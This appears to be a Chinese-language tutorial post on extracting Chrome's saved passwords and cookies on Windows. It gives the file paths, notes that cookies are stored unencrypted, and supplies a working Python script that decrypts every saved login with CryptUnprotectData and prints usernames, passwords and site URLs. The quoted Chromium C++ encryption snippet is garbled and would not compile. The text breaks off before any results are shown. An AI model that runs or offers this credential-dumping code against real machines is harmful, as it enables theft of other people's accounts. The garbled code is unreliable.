Chrome最基本的私密数据
- 登录记住用户名密码
- 登录后保存的Cookie信息
chrome浏览器的数据应该都是在:C:\Users\XXXX\AppData\Local\Google\Chrome\User Data\Default下的,里面有很多数据,最基本的就是Login Data和Cookies文件,保存了一些敏感信息(sqllite),用db工具打开就能查看,cookie文件没有加密,login data中的密码加密了,不过也可以解析
Login Data密码解析
Chromium是开源的,其中有段密码加密的代码,可以发现是CryptProtectData,而这是Windows的api函数,应该也是有解密的函数的
Bool Encrypt::EncryptString(const std::string& plaintext,std::string* ciphertext) {
DATA_BLOB input;
Input.pbData = static_cast<DWORD>(plaintext.length());
DATA_BLOB output;
BOOL result = CryptProtectData(&input, L””,NULL, NULL, NULL, 0,&output);
If (!result)
Return false;
//复制操作
Ciphertext->assign(reinterpret_cast<std::string::value_type*>(output.pbData);
LocalFree(output.pbData);
Return true;
}
解密Password
把文件复制出来,win32crypt安装会报错,所以换成
pywin32
import os
import sys
import sqlite3
# import win32crypt
from win32 import win32crypt
db_file_path = 'F:\\test\\LoginData'
conn = sqlite3.connect(db_file_path)
cursor = conn.cursor()
cursor.execute(
'select username_value, password_value, signon_realm from logins')
# 接收全部返回结果
for data in cursor.fetchall():
passwd = win32crypt.CryptUnprotectData(data[1], None, None, None, 0)
print(passwd)
if passwd:
print('-------------------------')
print('[+]用户名: ' + data[0])
print('[+]密码: ' + str(passwd[1]))
print('[+]网站URL: ' + str(data[2]))
结果如下: